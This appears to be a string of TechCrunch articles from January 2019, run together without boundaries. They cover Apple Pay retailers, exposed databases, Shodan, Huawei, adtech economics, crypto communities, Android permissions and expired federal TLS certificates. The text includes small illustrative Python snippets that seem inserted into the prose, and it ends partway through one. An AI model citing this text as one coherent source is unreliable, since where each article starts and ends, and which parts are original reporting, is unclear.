A little more retail momentum for Apple Pay: Apple has announced another clutch of U.S. retailers will soon support its eponymous mobile payment tech — most notably discount retailer Target.
Apple Pay is rolling out to Target stores now, according to Apple, which says it will be available in all 1,850 of its U.S. retail locations “in the coming weeks”.
Also signing up to Apple Pay are fast food chains Taco Bell and Jack in the Box; Speedway convenience stores; and Hy-Vee supermarkets in the Midwest.
“With the addition of these national retailers, 74 of the top 100 merchants in the US and 65 per cent of all retail locations across the country will support Apple Pay,” notes Apple in a press release.
Speedway customers can use Apple Pay at all of its approximately 3,000 locations across the Midwest, East Coast and Southeast from today, according to Apple; and also at Hy-Vee stores’ more than 245 outlets in the Midwest.
It says the payment tech is also rolling out to more than 7,000 Taco Bell and 2,200 Jack in the Box locations “in the next few months”.
Back in the summer Apple announced it had signed up long-time holdout CVS, with the pharmacy introducing Apple Pay across its ~8,400 stand-alone locations last year.
Also signing up then: 7-Eleven, which Apple says launched support for Apple Pay in 95 per cent of its U.S. convenience stores in 2018.
Last year retail giant Costco also completed the rollout of Apple Pay to its more than 500 U.S. warehouses.
In December, Apple Pay also finally launched in Germany — where Apple slated it would be accepted at a range of “supermarkets, boutiques, restaurants and hotels and many other places” at launch, though ‘cash only’ remains a common demand from the country’s small businesses.
AIESEC, a non-profit that bills itself as the “world’s largest youth-run organization,” exposed more than four million intern applications with personal and sensitive information on a server without a password.
Bob Diachenko, an independent security researcher, found an unprotected Elasticsearch database containing the applications on January 11, a little under a month after the database was first exposed.
The database contained “opportunity applications” that included the applicant’s name, gender, date of birth, and the reasons why the person was applying for the internship, according to Diachenko’s blog post on SecurityDiscovery, shared exclusively with TechCrunch. The database also contained the date and time when an application was rejected.
AIESEC, which has more than 100,000 members in 126 countries, said the database was inadvertently exposed 20 days prior to Diachenko’s notification — just before Christmas — as part of an “infrastructure improvement project.”
The database was secured the same day of Diachenko’s private disclosure.
Laurin Stahl, AIESEC’s global vice president of platforms, confirmed the exposure to TechCrunch but claimed that no more than 40 users were affected.
Stahl said that the agency had “informed the users who would most likely be on the top of frequent search results” in the database — some 40 individuals, he said — after the agency found no large requests of data from unfamiliar IP addresses.
“Given the fact that the security researcher found the cluster, we informed the users who would most likely be on the top of frequent search results on all indices of the cluster,” said Stahl. “The investigation we did over the weekend showed that no more than 50 data records affecting 40 users were available in these results.”
Stahl said that the agency informed Dutch data protection authorities three days after the exposure.
“Our platform and entire infrastructure is still hosted in the EU,” he said, despite the organization’s recent relocation of its headquarters to Canada.
Non-profits, like companies and other organizations, are not exempt from European rules where EU citizens’ data is collected, and can face fines of up to €20 million or four percent of global annual revenue — whichever is higher — for serious GDPR violations.
It’s the latest example of an Elasticsearch instance going unprotected. Exposed databases found and secured last year include one leaking millions of real-time SMS text messages, another holding customer data from a popular massage service, and the phone contact lists of five million users of an exposed emoji app.
If you leave something on the internet long enough, someone will hack it.
The reality is that many device manufacturers make it far too easy by using default passwords that are widely documented, allowing anyone to log in as “admin” and snoop around. Often, there’s no password at all.
Enter “Shodan Safari,” a popular part-game, part-expression of catharsis, where hackers tweet and share their worst finds on Shodan, a search engine for exposed devices and databases that’s popular with security researchers. Almost anything that connects to the internet gets scraped and tagged in Shodan’s vast search engine — including what the device does and which internet ports are open, which helps Shodan understand what the device is. If a particular port is open, it could be a webcam. If a certain header comes back, its backend might be viewable in the browser.
Think of Shodan Safari as internet dumpster diving.
From cameras to routers, hospital CT scanners to airport explosive detector units, you’d be amazed — and depressed — at what you can find exposed on the open internet.
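That port-and-banner guesswork can be sketched as a toy classifier. The mappings below are illustrative assumptions, not Shodan’s actual fingerprinting rules, though the ports themselves are real conventions (554 for RTSP video streams, 9200 for Elasticsearch, 7547 for TR-069 router management):

```python
# Toy version of banner-based device fingerprinting: guess what a
# device is from its open port and the text it sends back.
def guess_device(port: int, banner: str) -> str:
    banner = banner.lower()
    if port == 554 or "rtsp" in banner:
        return "camera"           # RTSP streaming usually means a webcam/CCTV
    if port == 9200 or "elasticsearch" in banner:
        return "elasticsearch"    # a database answering, possibly without auth
    if port == 7547 or "server: router" in banner:
        return "router"           # TR-069 management port on home routers
    if "dicom" in banner:
        return "medical imaging"  # hospital scanners speak the DICOM protocol
    return "unknown"

print(guess_device(554, "RTSP/1.0 200 OK"))  # camera
```

Shodan’s real tagging is far richer, but the principle is the same: the device announces itself, and the scanner only has to listen.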
Biometric payment card startup Zwipe has swiped $14M to add to an earlier Series B round as it continues to work towards commercializing technology that embeds a fingerprint reader in payment plastic for an added layer of security.
“We are not commercially rolled out yet, we expect that to happen in the second half of this year, starting first in Europe and potentially in the Middle East,” a spokesman told us, saying the financing will be used to scale up the company to prepare for a commercial rollout of a biometric payment card solution in the second half of 2019.
He said it’s also eyeing additional form factors such as wearables down the line, penciling in 2020 for expanding into other devices and verticals.
It has yet to push its tech past the pilot stage with payment cards, though.
“Our technology is currently deployed in pilot programs in Italy, with Intesa Sanpaolo Bank and with 10 different banks across the Middle East,” the spokesman told us. “We have active partnerships globally. In APAC, specifically China and the Philippines, we expect to launch further trials in the near term. In Europe we have piloted with the Bank of Cyprus and expect to launch several more trials in Europe in the first half of 2019.”
The new funding was raised via an offering of 6M new shares, from around 2,300 investors, ahead of a planned listing of the company on Merkur Market, Oslo Børs. Zwipe says the share offer was substantially over-subscribed, and it expects trading to commence on or around January 28. The pre-money valuation of the company is stated as NOK 189 million ($22M).
Commenting on the raise in a statement, CEO Andre Løvestam said: “Zwipe is at the forefront of a global shift towards more secure and convenient contactless payments and the market is primed for growth. We are confident that our industry leading technology and partnerships will secure a strong market position both in the short and long-term. Thanks to the new funding received, we can intensify our efforts to support our customers and partners in ‘making convenience secure’.”
The US-China tension over Huawei is leaving telecommunications companies around the world at a crossroads, but one spoke out last week. Telus, one of Canada’s largest phone companies, showed support for its Chinese partner despite a global backlash against Huawei over cybersecurity threats.
“Clearly, Huawei remains a viable and reliable participant in the Canadian telecommunications space, bolstered by globally leading innovation, comprehensive security measures, and new software upgrades,” said an internal memo signed by a Telus executive that The Globe and Mail obtained.
The Vancouver-based firm is among a handful of Canadian companies that could potentially leverage the Shenzhen-based company to build out 5G systems, the technology that speeds up not just mobile connection but more crucially powers emerging fields like low-latency autonomous driving and 8K video streaming. TechCrunch has contacted Telus for comments and will update the article when more information becomes available.
The United States has long worried that China’s telecom equipment makers could be beholden to Beijing and thus pose espionage risks. As fears heighten, President Donald Trump is reportedly mulling a boycott of Huawei and ZTE this year, according to Reuters. The Wall Street Journal reported last week that US federal prosecutors may bring criminal charges against Huawei for stealing trade secrets.
Australia and New Zealand have both blocked local providers from using Huawei components. The United Kingdom has not officially banned Huawei but its authorities have come under pressure to take sides soon.
Canada, which is part of the Five Eyes intelligence-sharing network alongside Australia, New Zealand, the UK and the US, is still conducting a security review ahead of its 5G rollout but has been urged by the neighboring US to steer clear of Huawei in building the next-gen tech.
China has hit back at spy claims against its tech crown jewel over the past months. Last week, its ambassador to Canada Lu Shaye warned that blocking the world’s largest telecom equipment maker may yield repercussions.
“I always have concerns that Canada may make the same decision as the US, Australia and New Zealand did. And I believe such decisions are not fair because their accusations are groundless,” Lu said at a press conference. “As for the consequences of banning Huawei from 5G network, I am not sure yet what kind of consequences will be, but I surely believe there will be consequences.”
Last week also saw Huawei chief executive officer Ren Zhengfei appear in a rare interview with international media. At the roundtable, he denied security charges against the firm he founded in 1987 and cautioned the exclusion of Chinese firms may delay plans in the US to deliver ultra-high-speed networks to rural populations — including to the rich.
“If Huawei is not involved in this, these districts may have to pay very high prices in order to enjoy that level of experience,” argued Ren. “Those countries may voluntarily approach Huawei and ask Huawei to sell them 5G products rather than banning Huawei from selling 5G systems.”
The Huawei controversy comes as the US and China are locked in a trade war that’s sending reverberations across countries that rely on the US for security protection and China for investment and increasingly skilled — not just cheap — labor.
Canada got caught between the feuding giants after it arrested Huawei’s chief financial officer Meng Wanzhou, who’s also Ren’s daughter, at the request of US authorities. The White House is now facing an end-of-January deadline to file a formal extradition request for Meng. Meanwhile, Canadian Prime Minister Justin Trudeau and Trump are urging Beijing to release two Canadian citizens who Beijing detained following Meng’s arrest.
No one likes being stalked around the Internet by adverts. It’s the uneasy joke you can’t enjoy laughing at. Yet vast people-profiling ad businesses have made pots of money off an unregulated Internet by putting surveillance at their core.
But what if creepy ads don’t work as claimed? What if all the filthy lucre that’s currently being sunk into the coffers of ad tech giants — and far less visible but no less privacy-trampling data brokers — is literally being sunk, and could both be more honestly and far better spent?
Case in point: This week Digiday reported that the New York Times managed to grow its ad revenue after it cut off ad exchanges in Europe. The newspaper did this in order to comply with the region’s updated privacy framework, GDPR, which includes a regime of supersized maximum fines.
The newspaper business decided it simply didn’t want to take the risk, so first blocked all open-exchange ad buying on its European pages and then nixed behavioral targeting. The result? A significant uptick in ad revenue, according to Digiday’s report.
“NYT International focused on contextual and geographical targeting for programmatic guaranteed and private marketplace deals and has not seen ad revenues drop as a result, according to Jean-Christophe Demarta, SVP for global advertising at New York Times International,” it writes.
“Currently, all the ads running on European pages are direct-sold. Although the publisher doesn’t break out exact revenues for Europe, Demarta said that digital advertising revenue has increased significantly since last May and that has continued into early 2019.”
It also quotes Demarta summing up the learnings: “The desirability of a brand may be stronger than the targeting capabilities. We have not been impacted from a revenue standpoint, and, on the contrary, our digital advertising business continues to grow nicely.”
So while (of course) not every publisher is the NYT, publishers that have or can build brand cachet, and pull in a community of engaged readers, can and should pause for thought — and ask who really wins from the notion that digitally served ads must creep on consumers to work.
The NYT’s experience casts fresh doubt on long-running efforts by tech giants like Facebook to press publishers to give up more control and ownership of their audiences by serving and even producing content directly for the third party platforms. (Pivot to video anyone?)
Such efforts benefit platforms because they get to make media businesses dance to their tune. But pulling publishers away from their own distribution channels (and content convictions) looks to have a baser motive too: a cynical means of weakening the link between publishers and their audiences, and of making publishers reliant on adtech intermediaries squatting in the middle of the value chain.
There are other signs behavioural advertising might be a gigantically self-serving con too.
Look at non-tracking search engine DuckDuckGo, for instance, which has been making a profit by serving keyword-based ads and not profiling users since 2014, all the while continuing to grow usage — and doing so in a market that’s dominated by search giant Google.
DDG recently took in $10M in VC funding from a pension fund that believes there’s an inflection point in the online privacy story. These investors are also displaying strong conviction in the soundness of the underlying (non-creepy) ad business, again despite the overbearing presence of Google.
Meanwhile, Internet users continue to express widespread fear and loathing of the ad tech industry’s bandwidth- and data-sucking practices by running into the arms of ad blockers. Figures for usage of ad blocking tools step up each year, with between a quarter and a third of U.S. connected device users estimated to be blocking ads as of 2018 (rates are higher among younger users).
Ad blocking firm Eyeo, maker of the popular AdBlock Plus product, has achieved such a position of leverage that it gets Google et al to pay it to have their ads whitelisted by default — under its self-styled ‘acceptable ads’ program. (Though no one will say how much they’re paying to circumvent default ad blocks.)
So the creepy ad tech industry is not above paying other third parties for continued — and, at this point, doubly grubby (given the ad blocking context) — access to eyeballs. Does that sound even slightly like a functional market?
In recent years expressions of disgust and displeasure have also been coming from the ad spending side — triggered by brand-denting scandals attached to the hateful stuff algorithms have been serving shiny marketing messages alongside. You don’t even have to be worried about what this stuff might be doing to democracy to be a concerned advertiser.
Fast moving consumer goods giants Unilever and Procter & Gamble are two big spenders which have expressed concerns. The former threatened to pull ad spend if social network giants didn’t clean up their act and prevent their platforms algorithmically accelerating hateful and divisive content.
The latter, meanwhile, has been actively reevaluating its marketing spending, taking a closer look at what digital actually does for it. Last March Adweek reported it had slashed $200M from its digital ad budget yet seen its reach grow by 10 per cent, after reinvesting the money in areas with “media reach”, including television, audio and ecommerce.
The company’s CMO, Marc Pritchard, declined to name which companies it had pulled ads from but in a speech at an industry conference he said it had reduced spending “with several big players” by 20 per cent to 50 per cent, and still its ad business grew.
So chalk up another tale of reduced reliance on targeted ads yielding unexpected business uplift.
At the same time, academics are digging into the opaquely shrouded question of who really benefits from behavioral advertising. And perhaps getting closer to an answer.
Last fall, at an FTC hearing on the economics of big data and personal information, Carnegie Mellon University professor of IT and public policy, Alessandro Acquisti, teased a piece of yet-to-be-published research — working with a large U.S. publisher that provided the researchers with millions of transactions to study.
Acquisti said the research showed that behaviourally targeted advertising had increased the publisher’s revenue but only marginally. At the same time they found that marketers were having to pay orders of magnitude more to buy these targeted ads, despite the minuscule additional revenue they generated for the publisher.
“What we found was that, yes, advertising with cookies — so targeted advertising — did increase revenues — but by a tiny amount. Four per cent. In absolute terms the increase in revenues was $0.000008 per advertisement,” Acquisti told the hearing. “Simultaneously we were running a study, as merchants, buying ads with a different degree of targeting. And we found that for the merchants sometimes buying targeted ads over untargeted ads can be 500% more expensive.”
“How is it possible that for merchants the cost of targeting ads is so much higher whereas for publishers the return on increased revenues for targeted ads is just 4%?” he wondered, posing a question that publishers should really be asking themselves — given, in this example, they’re the ones doing the dirty work of snooping on (and selling out) their readers.
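The asymmetry is easy to make concrete with back-of-the-envelope arithmetic. The unit prices below are invented for illustration; only the 4% and 500% figures come from Acquisti’s remarks:

```python
# Publisher side: a targeted (cookie-enabled) impression earns ~4% more.
untargeted_revenue = 1.00                       # revenue per ad, arbitrary unit
targeted_revenue = untargeted_revenue * 1.04    # +4% uplift

# Merchant side: the same targeted impression can cost 500% more, i.e. 6x.
untargeted_cost = 1.00                          # cost per ad, arbitrary unit
targeted_cost = untargeted_cost * 6.0

publisher_gain = targeted_revenue - untargeted_revenue  # what the publisher gains
merchant_extra = targeted_cost - untargeted_cost        # what the merchant pays extra

# The gap between what merchants pay extra and what publishers gain is
# captured somewhere in between — by the adtech intermediaries.
intermediary_share = merchant_extra - publisher_gain
print(round(intermediary_share, 2))  # 4.96
```

On these (assumed) numbers, for every extra unit the merchant spends on targeting, less than one per cent of it reaches the publisher.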
Acquisti also made the point that a lack of data protection creates economic winners and losers, arguing this is unavoidable — and thus qualifying the oft-parroted tech industry lobby line that privacy regulation is a bad idea because it would benefit an already dominant group of players. The rebuttal is that a lack of privacy rules also does that. And that’s exactly where we are now.
“There is a sort of magical thinking happening when it comes to targeted advertising [that claims] everyone benefits from this,” Acquisti continued. “Now at first glance this seems plausible. The problem is that upon further inspection you find there is very little empirical validation of these claims… What I’m saying is that we actually don’t know very well to what extent these claims are true or false. And this is a pretty big problem because so many of these claims are accepted uncritically.”
There’s clearly far more research that needs to be done to robustly interrogate the effectiveness of targeted ads against platform claims and versus more vanilla types of advertising (i.e. types that don’t demand reams of personal data to function). But the fact that robust research hasn’t been done is itself interesting.
Acquisti noted the difficulty of researching “opaque blackbox” ad exchanges that aren’t at all incentivized to be transparent about what’s going on. He also pointed out that Facebook has sometimes admitted to having made mistakes that significantly inflated its ad engagement metrics.
His wider point is that much current research into the effectiveness of digital ads is problematically narrow and so is exactly missing a broader picture of how consumers might engage with alternative types of less privacy-hostile marketing.
In a nutshell, then, the problem is the lack of transparency from ad platforms; a lack that serves the self-same opaque giants.
But there’s more. Critics of the current system point out it relies on mass scale exploitation of personal data to function, and many believe this simply won’t fly under Europe’s tough new GDPR framework.
They are applying legal pressure via a set of GDPR complaints, filed last fall, that challenge the legality of a fundamental piece of the (current) adtech industry’s architecture: Real-time bidding (RTB); arguing the system is fundamentally incompatible with Europe’s privacy rules.
We covered these complaints last November but the basic argument is that bid requests essentially constitute systematic data breaches because personal data is broadcast widely to solicit potential ad buys and thereby poses an unacceptable security risk — rather than, as GDPR demands, people’s data being handled in a way that “ensures appropriate security”.
To spell it out, the contention is the entire behavioral advertising business is illegal because it’s leaking personal data at such vast and systematic scale it cannot possibly comply with EU data protection law.
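The complaints turn on what a bid request actually contains. The sketch below models a simplified, OpenRTB-style request as a Python dict; the field names loosely follow the OpenRTB convention (`user`, `device`, `geo`, `site`) but the values, and the exact shape, are invented for illustration:

```python
# A simplified, OpenRTB-style bid request: the data a publisher's page
# broadcasts to exchanges (and their downstream bidders) to solicit bids.
bid_request = {
    "id": "req-001",                              # hypothetical request ID
    "user": {"id": "adtech-user-4f2a"},           # pseudonymous profile ID
    "device": {
        "ua": "Mozilla/5.0 (Windows NT 10.0)",    # browser fingerprint material
        "ip": "203.0.113.7",
        "geo": {"lat": 52.52, "lon": 13.40},      # location, sometimes precise
    },
    "site": {"page": "https://example.com/health/depression-help"},
}

# The complainants' point: every one of these fields leaves the
# publisher's control the moment the request is broadcast, with no way
# to audit what the hundreds of receiving bidders do with it.
personal_fields = [
    bid_request["user"]["id"],
    bid_request["device"]["ip"],
    bid_request["device"]["geo"],
]
print(len(personal_fields))  # 3
```

Note how even the page URL can be sensitive on its own: combined with a persistent user ID, it reveals reading habits — here, a hypothetical health-related page — to every party in the auction.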
Regulators are considering the argument, and courts may follow. But it’s clear adtech systems that have operated in opaque darkness for years, with no worry of major compliance fines, no longer have the luxury of being able to take their architecture as a given.
Greater legal risk might be catalyst enough to encourage a market shift towards less intrusive targeting; ads that aren’t targeted based on profiles of people synthesized from heaps of personal data but, much like DuckDuckGo’s contextual ads, are only linked to a real-time interest and a generic location. No creepy personal dossiers necessary.
If Acquisti’s research is to be believed — and here’s the kicker for Facebook et al — there’s little reason to think such ads would be substantially less effective than the vampiric microtargeted variant that Facebook founder Mark Zuckerberg likes to describe as “relevant”.
The ‘relevant ads’ badge is of course a self-serving concept which Facebook uses to justify creeping on users while also pushing the notion that its people-tracking business inherently generates major extra value for advertisers. But does it really do that? Or are advertisers buying into another puffed up fake?
Facebook isn’t providing access to internal data that could be used to quantify whether its targeted ads are really worth all the extra conjoined cost and risk. While the company’s habit of buying masses of additional data on users, via brokers and other third party sources, makes for a rather strange qualification. Suggesting things aren’t quite what you might imagine behind Zuckerberg’s drawn curtain.
Behavioral ad giants are facing growing legal risk on another front. The adtech market has long been referred to as a duopoly, on account of the proportion of digital ad spending that gets sucked up by just two people-profiling giants: Google and Facebook (the pair accounted for 58% of the market in 2018, according to eMarketer data) — and in Europe a number of competition regulators have been probing the duopoly.
Earlier this month the German Federal Cartel Office was reported to be on the brink of partially banning Facebook from harvesting personal data from third party providers (including but not limited to some other social services it owns). Though an official decision has yet to be handed down.
In March 2018, the French Competition Authority published a meaty opinion raising multiple concerns about the online advertising sector — and calling for an overhaul and a rebalancing of transparency obligations to address publisher concerns that dominant platforms aren’t providing access to data about their own content.
The EC’s competition commissioner, Margrethe Vestager, is also taking a closer look at whether data hoarding constitutes a monopoly. And has expressed a view that, rather than breaking companies up in order to control platform monopolies, the better way to go about it in the modern ICT era might be by limiting access to data — suggesting another potentially looming legal headwind for personal data-sucking platforms.
At the same time, the political risks of social surveillance architectures have become all too clear.
Whether microtargeted political propaganda works as intended or not is still a question mark. But few would support letting attempts to fiddle elections just go ahead and happen anyway.
Yet Facebook has rushed to normalize what are abnormally hostile uses of its tools; aka the weaponizing of disinformation to further divisive political ends — presenting ‘election security’ as just another day-to-day cost of being in the people farming business. When the ‘cost’ for democracies and societies is anything but normal.
Whether or not voters can be manipulated en masse via the medium of targeted ads, the act of targeting itself certainly has an impact — by fragmenting the shared public sphere which civilized societies rely on to drive consensus and compromise. Ergo, unregulated social media is inevitably an agent of antisocial change.
The solution to technology threatening democracy is far more transparency: regulating platforms so that we can understand how, why and where data is flowing, and thus get a proper handle on impacts in order to shape desired outcomes.
Greater transparency also offers a route to begin to address commercial concerns about how the modern adtech market functions.
And if and when ad giants are forced to come clean — about how they profile people; where data and value flows; and what their ads actually deliver — you have to wonder what if anything will be left unblemished.
People who know they’re being watched alter their behavior. Similarly, platforms may find behavioral change enforced upon them, from above and below, when it becomes impossible for everyone else to ignore what they’re doing.
A funny thing happened in the second half of 2018. At some moment, all the people active in crypto looked around and realized there weren’t very many of us. The friends we’d convinced during the last holiday season were no longer speaking to us. They had stopped checking their Coinbase accounts. The tide had gone out from the beach. Tokens and blockchains were supposed to change the world; how come nobody was using them?
In most cases, still, nobody is using them. In this respect, many crypto projects have succeeded admirably. Cryptocurrency’s appeal is understood by many as freedom from human fallibility. There is no central banker, playing politics with the money supply. There is no lawyer, overseeing the contract. Sometimes it feels like crypto developers adopted the defense mechanism of the skunk. It’s working: they are succeeding at keeping people away.
Some now acknowledge the need for human users, the so-called “social layer,” of Bitcoin and other crypto networks. That human component is still regarded as its weakest link. I’m writing to propose that crypto’s human component is its strongest link. For the builders of crypto networks, how to attract the right users is a question that should come before how to defend against attackers (aka, the wrong users). Contrary to what you might hear on Twitter, when evaluating a crypto network, the demographics and ideologies of its users do matter. They are the ultimate line of defense, and the ultimate decision-maker on direction and narrative.

What Ethereum got right
Since the collapse of The DAO, no one in crypto should be allowed to say “code is law” with a straight face. The DAO was a decentralized venture fund that boldly claimed pure governance through code, then imploded when someone found a loophole. Ethereum, a crypto protocol on which The DAO was built, erased this fiasco with a hard fork, walking back the ledger of transactions to the moment before disaster struck. Dissenters from this social-layer intervention kept going on Ethereum’s original, unforked protocol, calling it Ethereum Classic. To so-called “Bitcoin maximalists,” the DAO fork is emblematic of Ethereum’s trust-dependency, and therefore its weakness.
There’s irony, then, in maximalists’ current enthusiasm for narratives describing Bitcoin’s social-layer resiliency. The story goes: in the event of a security failure, Bitcoin’s community of developers, investors, miners and users are an ultimate layer of defense. We, Bitcoin’s community, have the option to fork the protocol—to port our investment of time, capital and computing power onto a new version of Bitcoin. It’s our collective commitment to a trust-minimized monetary system that makes Bitcoin strong. (Disclosure: I hold bitcoin and ether.)
Even this narrative implies trust—in the people who make up that crowd. Historically, Bitcoin Core developers, who maintain the Bitcoin network’s dominant client software, have also exerted influence, shaping Bitcoin’s road map and the story of its use cases. Ethereum’s flavor of minimal trust is different, having a public-facing leadership group whose word is widely imbibed. In either model, the social layer abides. When they forked away The DAO, Ethereum’s leaders had to convince a community to come along.
You can’t believe in the wisdom of the crowd and discount its ability to see through an illegitimate power grab, orchestrated from the outside. When people criticize Ethereum or Bitcoin, they are really criticizing this crowd, accusing it of a propensity to fall for false narratives.

How do you protect Bitcoin’s codebase?
In September, Bitcoin Core developers patched and disclosed a vulnerability that would have enabled an attacker to crash the Bitcoin network. That vulnerability originated in March 2017, with Bitcoin Core 0.14. It sat there for 18 months until it was discovered.
There’s no doubt Bitcoin Core attracts some of the best and brightest developers in the world, but they are fallible and, importantly, some of them are pseudonymous. Could a state actor, working pseudonymously, produce code good enough to be accepted into Bitcoin’s protocol? Could he or she slip in another vulnerability, undetected, for later exploitation? The answer is undoubtedly yes, it is possible, and it would be naïve to believe otherwise. (I doubt Bitcoin Core developers themselves are so naïve.)
Why is it that no government has yet attempted to take down Bitcoin by exploiting such a weakness? Could it be that governments and other powerful potential attackers are, if not friendly, at least tolerant towards Bitcoin’s continued growth? There’s a strong narrative in Bitcoin culture of crypto persisting against hostility. Is that narrative even real?

The social layer is key to crypto success
Some argue that sexism and racism don’t matter to Bitcoin. They do. Bitcoin’s hodlers should think carefully about the books we recommend and the words we write and speak. If your social layer is full of assholes, your network is vulnerable. Not all hacks are technical. Societies can be hacked, too, with bad or insecure ideas. (There are more and more examples of this, outside of crypto.)
Not all white papers are as elegant as Satoshi Nakamoto’s Bitcoin white paper. Many run over 50 pages, dedicating lengthy sections to imagining various potential attacks and how the network’s internal “crypto-economic” system of incentives and penalties would render them bootless. They remind me of the vast digital fortresses my eight-year-old son constructs in Minecraft, bristling with trap doors and turrets.
I love my son (and his Minecraft creations), but the question both he and crypto developers may be forgetting to ask is, why would anyone want to enter this forbidding fortress—let alone attack it? Who will enter, bearing talents, ETH or gold? Focusing on the user isn’t yak shaving, when the user is the ultimate security defense. I’m not suggesting security should be an afterthought, but perhaps a network should be built to bring people in, rather than shut them out.
The author thanks Tadge Dryja and Emin Gün Sirer, who provided feedback that helped hone some of the ideas in this article.
Google is removing apps from Google Play that request permission to access call logs and SMS text message data but haven’t been manually vetted by Google staff.
The search and mobile giant said it is part of a move to cut down on apps that have access to sensitive calling and texting data.
Google said in October that Android apps will no longer be allowed to use the legacy permissions as part of a wider push for developers to use newer, more secure and privacy-minded APIs. Many apps request access to call logs and texting data to verify two-factor authentication codes, for social sharing, or to replace the phone dialer. But Google acknowledged that this level of access can be — and has been — abused by developers who misuse the permissions to gather sensitive data, or mishandle it altogether.
“Our new policy is designed to ensure that apps asking for these permissions need full and ongoing access to the sensitive data in order to accomplish the app’s primary use case, and that users will understand why this data would be required for the app to function,” wrote Paul Bankhead, Google’s director of product management for Google Play.
Any developer wanting to retain the ability to ask a user’s permission for calling and texting data has to fill out a permissions declaration.
Google will review the app and why it needs to retain access, and will weigh in several considerations, including why the developer is requesting access, the user benefit of the feature that’s requesting access, and the risks associated with having access to call and texting data.
Bankhead conceded that under the new policy, some use cases will “no longer be allowed,” rendering some apps obsolete.
So far, tens of thousands of developers have already submitted new versions of their apps that either remove the need for call and texting permissions, Google said, or have submitted a permissions declaration.
Developers with a submitted declaration have until March 9 to receive approval or remove the permissions. In the meantime, Google has a full list of permitted use cases for the call log and text message permissions, as well as alternatives.
The last two years alone have seen several high-profile cases of Android apps or other services leaking or exposing call and text data. In late 2017, popular Android keyboard ai.type exposed a massive database of 31 million users, including 374 million phone numbers.
2018 wasn’t all bad. It turned out to be a record year for venture capital firms investing in cybersecurity companies.
According to new data out by Strategic Cyber Ventures, a cybersecurity-focused investment firm with a portfolio of four cybersecurity companies, more than $5.3 billion was funneled into companies focused on protecting networks, systems and data across the world, despite fewer deals done during the year.
That’s up 20 percent from the $4.4 billion raised in 2017, and close to double the 2016 total.
Part of the reason was several “mega” funding rounds, according to the company, with some of the big eight companies getting bigger and amassing a total of $1.3 billion in funding during the year. That includes Tanium’s combined $375 million investment, AnchorFree’s $295 million and CrowdStrike’s $200 million.
According to the report, North America leads the rest of the world with $4 billion in VC funding, with Europe trailing at around $550 million but growing year-over-year.
In fact, according to the data, California — where many of the big companies have their headquarters — accounts for nearly half of all VC funding in cybersecurity in 2018.
By comparison, only about $300 million went to the “government” region — including Maryland, Virginia, and Washington DC, where many government-backed or focused companies are located.
“As DC residents, we have to think there is more the city could do to entice cybersecurity companies to establish their headquarters in the city,” the firm said. Virtru, an email encryption and data privacy firm, drove the only funding of cybersecurity investment in Washington DC last year, they added.
“We’ve seen this trend in the broader tech ecosystem as well, with many, large international funds and investment outside of the U.S.,” the firm said. “Simply put, amazing and valuable technology companies are being created outside of the U.S.”
Looking ahead, Tanium and CrowdStrike are widely anticipated to IPO this year — so long as the markets hold stable.
“It’s still unclear what the public equity markets have in store in 2019,” the firm said. “A few weeks in and we’re already experiencing a government shutdown, trade wars with China, and expected slow down in global economic growth.”
“However, only time will tell what 2019 has in store,” the firm concluded.
Twitter accidentally revealed some users’ “protected” (aka, private) tweets, the company disclosed this afternoon. The “Protect your Tweets” setting typically allows people to use Twitter in a non-public fashion. These users get to approve who can follow them and who can view their content. For some Android users over a period of several years, that may not have been the case – their tweets were actually made public as a result of this bug.
The company says that the issue impacted Twitter for Android users who made certain account changes while the “Protect your Tweets” option was turned on.
For example, if the user had changed their account email address, the “Protect your Tweets” setting was disabled.
We’ve become aware of and fixed an issue where the “Protect your Tweets” setting was disabled on Twitter for Android. Those affected have been alerted and we’ve turned the setting back on for them. More here: https://t.co/0qM5B1S393
— Twitter Support (@TwitterSupport) January 17, 2019
Twitter tells TechCrunch that’s just one example of an account change that could have prompted the issue. We asked for other examples, but the company declined to share any specifics.
What’s fairly shocking is how long this issue has been happening.
Twitter says that users may have been impacted by the problem if they made these account changes between November 3, 2014, and January 14, 2019 – the day the bug was fixed.
The company has now informed those who were affected by the issue, and has re-enabled the “Protect your Tweets” setting if it had been disabled on those accounts. But Twitter says it’s making a public announcement because it “can’t confirm every account that may have been impacted.” (!!!)
The company explains to us it was only able to notify those people where it was able to confirm the account was impacted, but says it doesn’t have a complete list of impacted accounts. For that reason, it’s unable to offer an estimate of how many Twitter for Android users were affected in total.
This is a sizable mistake on Twitter’s part, as it essentially made content that users had explicitly indicated they wanted private available to the public. It’s unclear at this time if the issue will result in a GDPR violation and fine.
The one bright spot is that some of the impacted users may have noticed their account had become public because they would have received alerts – like notifications that people were following them without their direct consent. That could have prompted the user to re-enable the “protect tweets” setting on their own. But they may have chalked up the issue to user error or a small glitch, not realizing it was a system-wide bug.
“We recognize and appreciate the trust you place in us, and are committed to earning that trust every day,” wrote Twitter in a statement. “We’re very sorry this happened and we’re conducting a full review to help prevent this from happening again.”
The company says it believes the issue is now fully resolved.
We like to think of ourselves as nerds here at TechCrunch, which is why we’re bringing you this.
During the government shutdown, security experts noticed several federal websites were throwing back browser errors because the TLS certificate, which lights up your browser with “HTTPS” or flashes a padlock, on many domains had expired. And because so many federal workers have been sent home on unpaid leave — or worse, working without pay but trying to fill in for most of their furloughed department — expired certificates aren’t getting renewed.
Depending on the security level, most websites will kick back browser errors. Some won’t let you in at all until the expired certificate is renewed.
We got thinking: how many of the major departments and agencies are at risk? We looked at the list of government domains (not including subdomains) from 18F, the government’s digital services unit, which updated the list just before the shutdown. Then we filtered out all the state domains, leaving just the domains of all federal agencies and the executive branch. We put all of those domains through a Python script that pulls information from the TLS certificate of each domain and returns its expiry value. Running that for a few hours in a bash script, we returned with a few thousand results.
In other words, we poked every certificate to see if it had expired — and, if not, when it would stop working.
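The core of that check is short. Here's a minimal Python sketch of our own — not the script TechCrunch actually ran — that performs a TLS handshake, reads a certificate's `notAfter` field, and counts the days remaining:

```python
import socket
import ssl
from datetime import datetime, timezone

def cert_expiry(host, port=443, timeout=10):
    """Return the expiry datetime of `host`'s TLS certificate.

    Raises ssl.SSLCertVerificationError if the certificate is already
    expired (or otherwise fails validation) -- which, for a survey like
    this one, is itself an answer.
    """
    context = ssl.create_default_context()
    with socket.create_connection((host, port), timeout=timeout) as sock:
        with context.wrap_socket(sock, server_hostname=host) as tls:
            # e.g. "Feb  1 12:00:00 2019 GMT"
            not_after = tls.getpeercert()["notAfter"]
    epoch = ssl.cert_time_to_seconds(not_after)
    return datetime.fromtimestamp(epoch, tz=timezone.utc)

def days_left(expiry, now=None):
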